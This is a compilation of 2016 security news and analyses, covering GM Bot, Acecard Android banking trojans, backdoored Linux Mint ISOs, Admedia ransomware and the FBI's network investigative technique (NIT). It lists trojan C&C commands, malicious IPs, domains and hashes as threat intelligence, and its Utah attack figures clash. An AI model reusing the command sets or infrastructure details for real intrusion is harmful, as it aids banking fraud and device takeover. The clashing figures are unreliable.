According to the intelligence experts, Russian hackers are also targeting organisations in Turkey managing information related the involvement of the Turkish government in the conflict in Syria. Russian hackers are collecting any kind of information on the Turkish Government due to the worsening of the relationship among the two countries.
Western intelligence fears the evolution of the events in Syria, western politicians believe that Russia is involved in the fight against Isis in the country to support the Bashar al-Assad’s Government against dissident. Many organizations are accusing the Russian forces in the area for attacks against civilian and opponents of the regime.
The experts at FireEye discovered that hackers launched spear-phishing campaign against their targets and also used replicas of legitimate organisations’ websites to track visitors and identify opponents of the Regime.
“It could be for two reasons,” said Jens Monrad, global intelligence liaison at FireEye. “One is to send out false information from those groups, or they could be using their credentials as stepping stones to go on and target other individuals or organisations. It all fits with Russia’s traditional information warfare doctrine.”
GM Bot (Android Malware) Source Code Leaked Online
22.2.2016 Android
The source code of a recently discovered Android banking Trojan that has the capability to gain administrator access on your smartphone and completely erase your phone's storage has been LEAKED online.
The banking Trojan family is known by several names; Security researchers from FireEye dubbed it SlemBunk, Symantec dubbed it Bankosy, and last week when Heimdal Security uncovered it, they dubbed it MazarBot.
All the above wave of Android banking Trojans originated from a common threat family, dubbed GM Bot, which IBM has been tracking since 2014.
GM Bot emerged on the Russian cybercrime underground forums, sold for $500 / €450, but it appears someone who bought the code leaked it on a forum in December 2015, the IBM X-Force team reported.
What is GM Bot and Why Should You Worry about it?
The recent version of GM Bot (dubbed MazarBOT) has the capability to display phishing pages on the top of mobile banking applications in an effort to trick Android users into handing over their financial credentials to the fraudsters.
Besides this, the banking trojan is also capable of forwarding phone calls and intercepting SMS messages to help fraudsters bypass an additional layer of bank security mechanisms, and locking a device’s screen.
Cyber criminals could also use the malware to:
Spy on victims
Delete data from the infected device
Gain boot persistence to help survive device restart
Send and Read your SMS message
Make Calls to your contacts
Read the phone's state
Plague phone's control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device's storage (the most critical capabilities of the malware)
However, someone leaked the malware source code only to boost his/her reputation on an underground forum, according to the researchers.
GM Bot Android Malware Source Code for FREE
Yes, the source code for GM Bot and its control panel is now accessible to cybercriminals and fraudsters for FREE.
Here’s the Cherry on the Top:
Besides the source code, the leader also posted a tutorial and instructions for server-side installation, which means cybercriminals can create their own versions of the malware strain to conduct online banking frauds.
Though the archive file containing the source code and its control panel is password protected, the leader is offering the password only to active forum members who is approaching him.
"Those who received the password, in turn, passed it on to other, unintended users, so the actual distribution of the code went well beyond that discussion board’s member list," IBM cyber security evangelist Limor Kessem wrote in a blog post.
Online users had started sharing the password to the archive among their friends, and in no time, the GM Bot source code was all over the hacking underground forums.
GM Bot is one of the most dangerous banking trojan in the Android ecosystem and after its source code gets leaked, users are recommended to beware while banking online.
How to Protect Yourself?
As I previously mentioned, online users are advised to follow these steps in order to protect themselves against this kind of threat:
Never open attachments from unknown sources.
Never click on links in SMS or MMS messages sent to your phone.
Even if the email looks legit, go directly to the source website and verify any possible updates.
Go to Settings → Security → Turn OFF "Allow installation of apps from sources other than the Play Store" option.
Always keep an up-to-date Anti-virus app on your Android devices.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
NSA Data Center Experiencing 300 Million Hacking Attempts Per Day
22.2.2016 Hacking
Utah State computer systems are experiencing a massive cyber attack on up to 300 Million Hacking attempts per day due to National Security Agency’s (NSA) data center in the state.
Yes, 300,000,000 hacking attempts in a day!
According to the statistical survey, it is evident that the computer systems in the US State of Utah began to experience the hacking attack a few years back, precisely, soon after the NSA revelations by global surveillance whistleblower Edward Snowden.
It is a less-known fact that the NSA has built its new data center near the city of Bluffdale, Utah. However, a couple of years back, when Snowden revealed the presence of the data center, the attacks have constantly been going on.
The PRISM spying program by Big Brothers at NSA might have shifted the attention of hackers for the retaliation against mass-surveillance and flared up this heightened cyber attacks against the spying agency.
According to Utah Commissioner of public safety, Keith Squires, as quoted by KUTV:
"In 2010, my IT director was letting me know that the number of attacks we were averaging a day was between 25,000 to 80,000. We had peaks in the past year or so that were over 300,000,000 a day."
Additionally, advanced weapons systems at Hill Air Force Base and other tech companies in Utah could also be the reason for this fueling cyber attacks.
TECHNICALITIES
The Security officers had identified the sudden influx of IP traffic traced into foreign IP ranges and said the incident would be a model of a botnet attack.
The botnet network scans for the technical glitches in the communication pathways to infect the system, as per its Command and Control (C&C) instructions.
In an attempt to minimize the attacking vector, Utah Security Officer had blocked the IP addresses from China, Russia, and Indonesia.
In the majority of cases, hackers are trying to gain a single access by many tactical ploys that could lead them to land into the NSA mainframes.
As NSA has been alarmed a warning bell; a short note for the hackers
The Big Brother is Watching you…!
Admedia attacks now rely also on Joomla to serve ransomware
22.2.2016 Virus
Operators running websites based on the WordPress and Joomla must be aware of a spike in the number of compromised platforms used in Admedia attacks.
Not only WordPress CMS, threat actors behind the “Admedia attacks” are now looking with increasing interest to Joomla. This is the discovery made by the experts at the Internet Storm Center (ISC) that discovered the presence of the bad actors responsible of the Admedia attacks, behind a hacking campaign that targeted Joomla-hosted sites.
Early February, experts at Sucuri reported a spike in compromised WordPress sites generating hidden iframes with malicious URLs referencing domain hosting exploit kit. The researchers at Sucuri observed the use of the string “admedia” in most URLs generated by the iframes.
“These “admedia” URLs act as a gate between the compromised website and the EK server. EK traffic associated with this campaign has generally sent TeslaCrypt ransomware. However, characteristics of this campaign have evolved since Sucuri’s original blog post.” states an analysis published by the Internet Storm Center (ISC).
The campaign is evolving, on Wednesday 2016-02-17 Brad Duncan, security researcher at Rackspace, discovered the new attack chain. The attacks started with a compromised website that generated an admedia gate, which led to Angler EK that is used to serve TeslaCrypt to vulnerable machines. The experts also highlighted that crooks behind the admedia attacks that initially relied on Nuclear exploit kit on compromised sites, now added the Angler exploit kit.
The analysis of the traffic generated by the malware allowed the ISC to identify the following components:
178.62.122.211 – img.belayamorda.info – admedia gate
185.46.11.113 – ssd.summerspellman.com – Angler EK
192.185.39.64 – clothdiapersexpert.com – TeslaCrypt callback traffic
The attackers compromised website generate the admedia gate by injecting malicious scripts.
“As the Sucuri blog already reported, each .js file returned by the compromised site had malicious script appended to it. In a case on 2016-02-15, I also saw the same type of script included in an HTML page from the compromised website; however, today’s traffic only shows injected script in the .js files.” Duncan wrote.
The above image demonstrates that attackers have started using “megaadvertize” in their gateway URLs, instead of “admedia.”
The Evolution of Acecard
22.6.2016 Zdroj: Kaspersky Virus
While working on the IT Threat Evolution report for Q3 2015, we discovered that Australia had become the leading country in terms of number of users attacked by mobile banker Trojans. We decided to find out what was behind this jump in activity and managed to identify the cause: Trojan-Banker.AndroidOS.Acecard. This family accounted for almost all the banker Trojan attacks in Australia.
After analyzing all the known malware modifications in this family, we established that they attack a large number of different applications. In particular, the targets include nine official social media apps that the Trojan attacks in order to steal passwords. Two other apps are targeted by the Trojan for their credit card details. But most interestingly, the list includes nearly 50 financial apps (client software for leading global payment systems and banks) and services, and the various modifications of Acecard make use of all the tools at their disposal to attack them – from stealing bank text messages to overlaying official app windows with phishing messages.
Here is another interesting fact that we established while investigating the Trojan: the modifications of Acecard were written by the same cybercriminals who earlier created Backdoor.AndroidOS.Torec.a, the first TOR Trojan for Android, as well as Trojan-Ransom.AndroidOS.Pletor.a, the first encryptor for mobile devices. All three Trojans run on Android.
How it all started
Given Acecard’s growing popularity and the rich criminal past of its creators, we decided to delve deeper into the history of this malware family.
It all started with Backdoor.AndroidOS.Torec.a. The first version of this malicious program was detected in February 2014 and could perform the following commands from the C&C server:
#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send information about the phone (phone number, country of residence, IMEI, model, OS version) to C&C;
#grab_apps – send a list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to numbers specified in the command;
#control_number – change the phone’s control number.
Then, in April 2014, a new version emerged with more capabilities. The additional commands were:
#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the SMS interception list;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#sentid – send an SMS with the Trojan’s ID to a specified number.
In late May 2014, we detected the first mobile encryptor, Trojan-Ransom.AndroidOS.Pletor.a. It encrypted files on the device and demanded a ransom for them to be decrypted. Some modifications of Pletor used TOR to communicate with the C&C.
A month later, we detected a new modification, Backdoor.AndroidOS.Torec. Unlike previous versions, it did not use TOR and targeted credit card details: the Trojan overlaid the official Google Play Store app with a phishing window that included data entry fields.
We assigned the verdict Trojan-Banker.AndroidOS.Acecard.a to this modification, and classified it as a separate family of malware. From that moment on, all new versions of the Trojan have been detected as belonging to the Acecard family.
An analysis and comparison of the code used in Backdoor.AndroidOS.Torec.a, Trojan-Ransom.AndroidOS.Pletor.a and Trojan-Banker.AndroidOS.Acecard.a has shown they were all written by the same cybercriminals. Here are some clear examples:
Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a
Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a
Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a
Here is another example:
Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a
Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a
Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a
A lot of the class, method and variable names are the same for all three Trojans. The code of the corresponding methods is either the same or very similar with only minor differences.
Acecard’s progress
The initial Trojan, Trojan-Banker.AndroidOS.Acecard.a, could only handle four commands sent from the C&C:
#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number.
The next modification of Acecard was detected in late August 2014 and used the TOR network for C&C communication, just like the earlier Pletor. Besides that, we identified two more differences. Firstly, the list of supported commands had grown to 15; nearly all of these commands had been seen before in earlier versions of the Trojan Torec:
#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the list of senders from which SMSs will be intercepted;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send the Trojan’s ID to the C&C;
#grab_apps – send the list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number;
#sentid – send an SMS with the Trojan’s ID to a specified number;
#show_dialog – show a dialog window to the user with specific objects (data entry fields, buttons etc.) depending on the C&C command parameters.
The second difference was the number of phishing windows. Along with the official Google Play Store app, this Trojan now overlaid the display of the following apps with its own windows:
IM services: WhatsApp, Viber, Instagram, Skype;
The apps of the VKontakte, Odnoklassniki and Facebook social networks
The Gmail client
The official Twitter client
In the second half of October 2014, we detected the next modification of Acecard. It no longer used TOR (neither have any of the versions of the Trojan subsequently detected). However, there was another, more important difference: starting with this version of the Trojan, there have been dramatic changes in the geography of the targeted users. The earlier versions mostly attacked users in Russia, but starting in October 2014 the bulk of Acecard attacks targeted users in Australia, Germany and France. Russia accounted for just 10% of the attacked users. This trend continued for another four months, until February 2015, but even then Australia, Germany and France still remained among the most frequently attacked countries.
At the same time, the geography of Pletor attacks remained largely unchanged: most attacks targeted, and continue to target, users in Russia and the US. The TOP 5 most attacked countries also includes Ukraine, Belarus and Saudi Arabia.
A new modification of Acecard emerged in mid-November 2014. As well as stealing passwords from popular social network clients, it started to overlay the banking app of Australia’s most popular bank with a phishing window. Just two days later, we managed to detect another modification of this Trojan that was already attacking the apps of four Australian banks.
This functionality has persisted up to the very latest Trojan-Banker.AndroidOS.Acecard modifications that we detect.
This version of Acecard also checks the country code and the service provider code as it launches, and if it finds itself in Russia, it shuts down. This check is carried out in almost all subsequent modifications. Interestingly, similar changes to Trojan-Ransom.AndroidOS.Pletor only took place in late March 2015, and did not extend to all versions of the malware.
For the next nine months, there was practically no change in the functionality of the new Acecard modifications that emerged, until early August 2015 when we detected a new version that was capable of overlaying the PayPal mobile app with its own phishing window.
There was also a new command that this version could perform – #wipe. When this command is received, Acecard resets the mobile device to factory settings.
It should be noted that there has been a dramatic increase in Acecard developer activity since June 2015. Before, we typically identified 2-5 files a month related to this Trojan; since June we have detected around 20 files per month.
Number of Acecard files detected each month
The graph above shows the number of files associated with the banking Trojan Acecard that are detected each month; these include both the modifications of Acecard and related files, such as downloader Trojans. The dramatic rise in file numbers detected in November and especially December is down to the malware writers making active use of a commercial code obfuscator and the emergence of obfuscated versions of the Trojan.
Also at this time, there was an increase in the number of attacks using this malicious program.
The number of unique users attacked by Acecard per month
In the first half of September, we detected a new modification of Acecard. Its new capabilities included overlaying the windows of more mobile banking apps, including those of one Australian bank, four New Zealand banks and three German banks.
It means this modification of the Trojan is capable of overlaying 20 apps – including 13 banking apps – with a phishing window.
The subsequent development of Acecard’s “banking business” then got even faster:
The next modification emerged just several days later, and was capable of overlaying as many as 20 banking applications. The list of targeted apps grew to include another app belonging to an Australian bank, four apps for Hong Kong banks and three for Austrian banks.
In late September, a new modification came out with a new functionality: the malicious program included a list of bank phone numbers, so text messages arriving from those banks are redirected to the cybercriminal. The Trojan has a list of phrases, so it can compare incoming text messages and identify those with verification codes for bank operations or registration, and send just the code to the cybercriminal, rather than the full SMS. This version of Acecard intercepts SMSs from 17 Russian banks.
Early October saw the emergence of a new modification that attacked the banking apps of the three largest US banks. Interestingly, from the very start, the US has been among the TOP 10 countries most often attacked by this Trojan; however, December 2015 saw a dramatic rise in the number of attacks on US users. In that month, the US came third in terms of the number of unique users attacked by this malware.
In mid-October, a new modification appeared capable of overlaying as many as 24 financial applications, including apps belonging to five Australian banks, four Hong Kong banks, four Austrian banks, four New Zealand banks, three German banks, three Singapore banks, and the PayPal app.
A new modification was detected in early November that has a phishing window that targets an app belonging to a Spanish bank.
It should also be noted that virtually all versions of Acecard can handle a C&C command that orders the Trojan to overlay any specified app with its own window. Perhaps the cybercriminals thought this option was more promising, because many of the versions detected in November and December 2015 have a dedicated window that only overlays Google Play and Google Music apps to target credit card details. No other applications will be overlaid without first receiving the appropriate C&C command.
The most recent versions of the Acecard family can attack the client applications of more than 30 banks and payment systems. Considering that these Trojans are capable of overlaying any application upon command, the overall number of attacked financial applications may be much larger.
Although the Trojans belonging to this family can attack users from a long list of countries, most attacks target users in Russia, Australia, Germany, Austria and France.
Number of unique users attacked by country
In Germany and Australia, the Trojan-Banker.AndroidOS.Acecard family is the most widespread type of mobile banker Trojan targeting users.
Propagation
In many countries, Trojans belonging to the Acecard family are typically distributed with the names Flash Player or PornoVideo, although other names are sometimes used in a bid to imitate useful and popular software. This malware family also propagates with the help of downloader Trojans that are detected by Kaspersky Lab’s products as Trojan-Downloader.AndroidOS.Acecard.
We should note that on 28 December we were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play Store.
A Trojan-Downloader.AndroidOS.Acecard.b page in Google Play Store
The Trojan propagates under the guise of a game, but in reality it has no useful functionality. The main goal of this malicious app is to download and install a fully functional modification of the banking Trojan Acecard. Its creators didn’t even bother to make it look like a legitimate application: when the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen.
We have also been able to detect a new modification of the downloader Trojan, Trojan-Downloader.AndroidOS.Acecard.c. It differs in that the Trojan, once launched, uses vulnerabilities in the system to gain super-user rights. With these privileges – Trojan-Downloader.AndroidOS.Acecard.c can install the banking Trojan Acecard into the system folder, which makes it impossible to delete using standard tools. However, in most cases this propagation method is used to spread another Trojan that we are already familiar with – Trojan-Ransom.AndroidOS.Pletor.
The cybercriminals are using virtually every available method to propagate the banking Trojan Acecard, be it under the guise of another program, via official app stores, or via other Trojans. This combination of propagation methods, which includes the exploitation of vulnerabilities in the operating system, along with Acecard’s capabilities make this mobile banker one of the most dangerous threats to users.
MD5
58FED8B5B549BE7ECBFBC6C63B84A728
8D260AB2BB36AEAF5B033B80B6BC1E6A
CF872ACDC583FE80B8F54957E14355DF
FBBCCD640CE75BD618A7F3187EC1B742
01E8CEA7DF22B1B3CC560ACB049F8EA0
DDCE6CE143CCA26E59063E7A4BB89019
9D34FC3CFCFFEA760FC1ADD377AA626A
03DA636518CCAF432AB68B269F7E6CC3
05EBAA5C7FFA440455ECB3519F923B56
E3FD483AD3731DD62FBE027B4E6880E6
53888352A4A1E3CB810B2A3F51D0BFC2
E1C794A614D5F6AAC38E2AEB77B139DA
54332ED8EA9AED12400A75496972D7D7
5DB57F89A85F647EBBC5BAFBC29C801E
702770D70C7AAB793FFD6A107FD08DAD
CF25782CAC01837ABACBF31130CA4E75
07DF64C87EA74F388EF86226BC39EADF
Beware of Backdoored Linux Mint ISOs
22.2.2016 Zdroj: Kaspersky Virus
Yesterday a blog post on “The Linux Mint Blog” caught our attention. Apparently criminals managed to compromise a vulnerable instance of WordPress which the project used to run their website. The attackers modified download links pointing to backdoored ISO files of Linux Mint 17.3 Cinnamon edition. This “should only impact people who downloaded this edition on February 20th”, the author of the blog stated.
We managed to get our hands on the malware embedded in the ISO images. Let’s have a quick look.
Malware used
The criminals used a simple backdoor, which is controlled via an unencrypted IRC connection. We found five hardcoded C&C addresses. At the time of writing only one of them was available. We saw approx. 50 connected clients just in this channel called “#mint”:
IRC channels and user count on malicious C&C server
The malware is capable of:
running several types of UDP and TCP flooding (used in DDoS attacks)
downloading arbitrary files to the victim’s machine
executing arbitrary commands on the machine
We’re detecting this type of malware as HEUR:Backdoor.Linux.Tsunami.bh.
According to user reports, the compromised ISO images come with the backdoor’s C-source code, located in /var/lib/man.cy, which is compiled on first startup to “apt-cache” and is then executed.
Activity
While monitoring the C&C channel, we saw the criminal sending several SMB-related commands like “smbtree -N” to the connected bots. Apparently the attacker tries to access SMB/CIFS shares available in the local network of the victims.
Conclusion
In order to detect this kind of attack, one should use PKI with strong cryptographic signatures to ensure the integrity of downloaded software.
Integrity-checks based on file hashes like MD5 or SHA256 are insecure if a project’s website is compromised, since the attacker could also adjust the checksums provided on the website.
FBI must reveal the network investigative technique used to hack more than 1000 computers
22.2.2016 Hacking
The FBI must provide details on the network investigative technique used to hack more than 1000 computers in a case involving child pornography.
In a case involving child pornography, the FBI was ruled by a judge to provide all the code used to hack the PC of suspects and detailed information related to the procedure they have followed to de-anonymize Tor users.
Colin Fieman, a federal public defender working on the case was asked by motherborard.vice.com if the code would include exploits to bypass security features, Fieman’s reply was that the code would bypass “everything.”
“The declaration from our code expert was quite specific and comprehensive, and the order encompasses everything he identified,” he told to MotherBoard.
Fieman is defending Jay Michaud, a Vancouver public schools administration worker arrested by the FBI right after the FBI closed a popular child pornography site called “Playpen” hosted in the dark web, and where a network investigative technique (NIT)—the agency’s term for a hacking tool.
The use of the NIT was also confirmed earlier this year when according to court documents reviewed by Motherboard, the FBI had used it to identify the suspects while surfing on the Tor network.
The network investigative technique (NIT) got the suspects’ real IP address, the MAC address and other pieces of information and sent them to the FBI machines.
In July, at least two individuals from New York have been charged with online child pornography crimes after visiting a hidden service on the Tor network.
According to the court documents, the FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.” The FBI was able to harvest around 1300 IPs, and until the moment 137 people have been charged. The network investigative technique used by the FBI included computers in the UK, Chile and Greece.
In January, a report published by the Washington Post confirmed that in the summer of 2013 Feds hacked the TorMail service by injecting the NIT code in the mail page in the attempt to track its users.
The problem is that the FBI used only one warrant to hack computers of unknown suspects all over the world. The defense also argues that the FBI left the child pornography site running in order to be able to do the network investigative technique.
Last month a judge rules that the FBI’s actions did not constitute “outrageous conduct.”, but now a new order got out and obligates the FBI to disclose all the code components used in the network investigative technique.
Michaud’s lawyers were trying to get access to the technique and code used by the FBI since September but it wasn’t until January that Vlad Tsyrklevitch (the defense’s consulted expert) received the discovery.
Tsyrklevitch now argues that the provided code was incomplete, missing several parts. Part of the missing code is the one that identifies Michaud PC. Tsyrklevitch also claimed that part of the code missing is the exploit used to break into machines.
“This component is essential to understanding whether there were other components that the Government caused to run on Mr. Michaud’s computer, beyond the one payload that the Government has provided,” Michaud’s lawyers wrote,
It is not the first time that judges requested FBI to disclose the code used in hacking operations. In 2012, a case called Operation Torpedo the FBI disclosed the details a Metasploit module used for their investigation.
Wired revealed that the law enforcement relied on the popular Metasploit framework to first de-anonymize operators of child porn websites in the Tor network.
“Now Metasploit has a new and surprising fan: the FBI. WIRED has learned that FBI agents relied on Flash code from an abandoned Metasploit side project called the “Decloaking Engine” to stage its first known effort to successfully identify a multitude of suspects hiding behind the Tor anonymity network.” states the reportpublished by Wired.
The Operation Tornado was revealed when the FBI seized three child porn sites on Tor based in Nebraska. The FBI, authorized by a special search warrant crafted by Justice Department lawyers in Washington, DC, delivered the tracking Flash code do de-anonymous visitors. The operation allowed the FBI to identify at least 25 users in the US and many others in foreign countries.
There is no doubt, cases like this one will be even more frequent and it’s possible that in the future more court order will obligate to disclose all the information about a “target”.
Source code of the Android GM Bot malware was leaked online
22.2.2016 Android
The experts at the IBM X-Force threat intelligence have discovered that the source code for Android malware GM Bot was leaked online.
Bad news for the Android community, the experts at IBM X-Force threat intelligence have discovered that the source code for Android malware GM Bot was leaked on an underground. The source code was leaked in December 2015, it include the bot component and the control panel.
It seems that one of GM Bot’s buyers decided to leak the code online to enhance credibility in the underground boards.
He leaked the code in an encrypted archive, then he indicated he would give the password only to active forum members who contacted him.
Of course, the code rapidly spread within the criminal ecosystem, it is now free and online is available a tutorial and the instructions for the server-side installation.
The availability online of the source code of a malware represents a crucial moment in the life cycle of malicious codes. Once the code is leaked online, cyber criminal organizations can work on it to create new variants that could be offered for sale or rent.
The original creator of the Android malware has sold the rights to distribute GM Bot v1 (aka MazarBot) to other cyber criminal organizations that is offering it for $500.
“According to X-Force threat intelligence, the code’s author moved on to working on a new version dubbed GM Bot v2.0, which is sold in financial fraud-themed underground boards.” states a blog post published by the X-Force threat intelligence.
GM Bot appeared in the wild in 2014, it was offered in the Russian underground as a powerful instrument for mobile phishing.
“This Android malware’s differentiating capability is its deployment of overlay screens on top of running banking applications, with the goal of tricking users into entering their access credentials into a fake window that will grab and forward them to a remote attacker.” continues the post.
The malware implements a number of features to target Android users, including intercepting SMS messages. The malware allows attackers to gain control of the targeted device, including the customization of fake screens.
In short, mobile banking Trojans such as GM Bot are a one-stop fraud shop for criminals:
They launch fake overlay windows that mimic bank applications to steal user credentials and payment card details.
They control the device’s SMS relay to eavesdrop, intercept and send out SMS messages.
They can forward phone calls to a remote attacker.
They have spyware features and can control the device via remote commands.
The experts at the IBM have analyzed only the control panel because many other organizations and security firms already produced a detailed analysis of malware.
The most interesting feature discovered by the experts in the GM Bot’s botnet administration panel is the possibility to create and deploy new injections to infected user devices.
Another interesting component of the Botnet is the “Search and Stats” section that allows operators to analyze their database that includes stolen information, credit card details, lists of apps installed on infected devices, bank accounts the victims and other info.
Let me suggest to give a look to the interesting analysis published by IBM that also includes the indicators of compromise.
Anonymous took down several government websites of Saudi Arabia
22.2.2016 Hacking
Anonymous launched a series of cyber attacks against government websites of Saudi Arabia to protest the execution of 47 people, including Mr. Sheikh Nimr Al Nimr.
The Anonymous collective is conducting a hacking campaign against the Saudi Arabian Government to protest executions of 47 people.
On January 2nd, the Government announced the executions on terrorism charges, among the victims also Sheikh Nimr Al Nimr and a convicted al-Qaeda leader Faris al-Zahrani.
The executions raised the tension between Saudi Arabia and Iran, but the events also triggered the Anonymous response.
The attacks launched by Anonymous are executed as part of the operations #OpSaudi and #OpNimr.
The #OpNimr campaign was launched in September 2015 to protest continuous violations of human rights. Anonymous targeted Saudi websites is in response to the death sentence handed down to 17-year-old Mohammed al-Nimr.
Ali al-Nimr was sentenced to death on 27 May 2014, when he was only 17 years old, for taking part in demonstrations against the government, attacking the security forces, possessing a machine-gun and armed robbery.
The man is also accused of using a BlackBerry to encourage people to join the protest.
As explained by Amnesty International the Government has based its judgment on confessions extorted under torture. Members of Anonymous have started their campaign calling for Nimr’s release, the hacktivists added that he had been denied a lawyer and confirmed the tortures.
The series of cyber attacks that recently targeted the Saudi Arabian Government shut down the official website of the Ministry of Defense, the Royal Air Force, Saudi Ministry of Education and the Saudi Press Association, the Saudi Defense ministry website, the Saudi Customs Service, the Saudi Mistry of Finances, the Saudi Ombudsman’s Office and the General Passports Service.
The websites have been already restored.
Warning! — Linux Mint Website Hacked and ISOs replaced with Backdoored Operating System
21.2.2016 Hacking
Are you also the one who downloaded Linux Mint on February 20th? You may have been Infected!
Linux Mint is one of the best and popular Linux distros available today, but if you have downloaded and installed the operating system recently you might have done so using a malicious ISO image.
Here's why:
Last night, Some unknown hacker or group of hackers had managed to hack into the Linux Mint website and replaced the download links on the site that pointed to one of their servers offering a malicious ISO images for the Linux Mint 17.3 Cinnamon Edition.
"Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it," the head of Linux Mint project Clement Lefebvre said in a surprising announcement dated February 21, 2016.
Who are affected?
As far as the Linux Mint team knows, the issue only affects the one edition, and that is Linux Mint 17.3 Cinnamon edition.
The situation happened last night, so the issue only impacts people who downloaded the above-mentioned version of Linux Mint on February 20th.
However, if you have downloaded the Cinnamon edition or release before Saturday 20th, February, the issue does not affect you. Even if you downloaded a different edition including Mint 17.3 Cinnamon via Torrent or direct HTTP link, this does not affect you either.
What had Happened?
Hackers believed to have accessed the underlying server via the team's WordPress blog and then got shell access to www-data.
From there, the hackers manipulated the Linux Mint download page and pointed it to a malicious FTP (File Transfer Protocol) server hosted in Bulgaria (IP: 5.104.175.212), the investigative team discovered.
The infected Linux ISO images installed the complete OS with the Internet Relay Chat (IRC) backdoor Tsunami, giving the attackers access to the system via IRC servers.
Tsunami is a well-known Linux ELF trojan that is a simple IRC bot used for launching Distributed Denial of Service (DDoS) attacks.
Hackers vs. Linux Mint SysAdmins
However, the Linux Mint team managed to discover the hack, cleaned up the links from their website quickly, announced the data breach on their official blog, and then it appears that the hackers compromised its download page again.
Knowing that it has failed to eliminate the exact point of entry of hackers, the Linux Mint team took the entire linuxmint.com domain offline to prevent the ISO images from spreading to its users.
The Linux Mint official website is currently offline until the team investigates the issue entirely. However, the hackers' motive behind the hack is not clear yet.
"What we don't know is the motivation behind this attack. If more efforts are made to attack our project and if the goal is to hurt us, we’ll get in touch with authorities and security firms to confront the people behind this," Lefebvre added.
Hackers Selling Linux Mint Website's Database
The hackers are selling the Linux Mint full website's database for a just $85, which shows a sign of their lack of knowledge.
The hack seems to be a work of some script kiddies or an inexperienced group as they opted to infect a top-shelf Linux distro with a silly IRC bot that is considered to be outdated in early 2010. Instead, they would have used more dangerous malware like Banking Trojans.
Also, even after the hack was initially discovered, the hackers re-compromised the site, which again shows the hackers' lack of experience.
Here's How to Protect your Linux Machine
Users with the ISO image can check its signature in an effort to make sure it is valid.
To check for an infected download, you can compare the MD5 signature with the official versions, included in Lefebvre's blog post.
If found infected, users are advised to follow these steps:
Take the computer offline.
Backup all your personal data.
Reinstall the operating system (with a clean ISO) or format the partition.
Change passwords for sensitive websites and emails.
You can read full detail about the hack here. The official website is not accessible at the time of writing. We’ll update the story when we hear more.
Utah systems experiences 300k hacking attacks a day due to the presence of the NSA Data Center
21.2.2016 Hacking
The representatives of the Utah State confirmed that their systems experiences 300,000 hacking attacks a day due to the presence of the NSA Data Center.
The Utah state computer systems experience 300 million hacking attacks a day due to the presence of the NSA data center in the state.
The Utah Data Center, also known as the Intelligence Community Comprehensive National Cybersecurity Initiative Data Center, is the mammoth data storage facility built by the NSA to store data gathered by the US intelligence. The official mission of the center is classified, the plant is located at Camp Williams near Bluffdale, Utah.
NSA data center 's Utah Data Center in Bluffdale, Utah, Thursday, June 6, 2013. The government is secretly collecting the telephone records of millions of U.S. customers of Verizon under a top-secret court order, according to the chairwoman of the Senate Intelligence Committee. The Obama administration is defending the National Security Agency's need to collect such records, but critics are calling it a huge over-reach. (AP Photo/Rick Bowmer)
Edward Snowden revealed the project was initially known as the Massive Data Repository within NSA, but was renamed to Mission Data Repository.
NSA Utah Data Center Lightweight Security for Sparse Staff Unlike HQ Bloat
40°25’36.59″ N 111°55’57.92″ W pic.twitter.com/sdlLO0eJC5
— Cryptome (@Cryptomeorg) 20 Febbraio 2016
The presence of the data center is an element of attraction for the hackers as explained by the experts at the Utah Commissioner of Public Safety, that confirmed a significant increase in the number of cyber attacks over the years.
“In 2010, my IT director was letting me know that the number of attacks we were averaging a day were between 25,000 to 80,000,” said Keith Squires, Utah Commissioner of Public Safety. “We had peaks in the past year or so that were over 300,000,000 a day.”
Hackers use botnets to scan the state’s computer systems, searching for vulnerable systems.
“Although other states were seeing increases, most were not seeing anything like we were,” Squires said. “We didn’t realize it at first, but my opinion is in that same time, Utah was getting a lot of notoriety for the NSA facility that was being built here.”
The number of cyber attacks against computer systems of other US states has increased in the last years, but the trend observed for state of the Utah is singular.
“The dynamics of Utah have changed,” the State of Utah’s Information Security Director told KUTV.
The systems of the states belong to government entities and tech companies working in the intelligence and cyber security industries, for this reason hackers consider them a privileged target.
The journalists at 2News interviewed Neil Wyler, a former punk hacker, now a cyber security expert and consultant, asking him how hackers operate to compromise government entities.
Wyler explained that hackers can potentially target any system to find a way to penetrate US government system.
“To illustrate, he used a hypothetical example of a business that hackers could not penetrate, but they knew employees of the company liked to eat at a pizza place down the street. So the hackers infiltrated the pizza business website, spread pizza coupons at the firm that was their real target — encouraging workers to download a corrupted pizza “menu” — only to allow the hackers to troll the real target’s computers.” states Wyler.
Squires highlighted the strong security posture of critical infrastructure in the state, NSA facility such as the airport were designed to ensure a high-level of security with “totally separate” networks.
But let me add that security is an instantaneous concept, what is safe now at this time, it might not be in a few seconds.
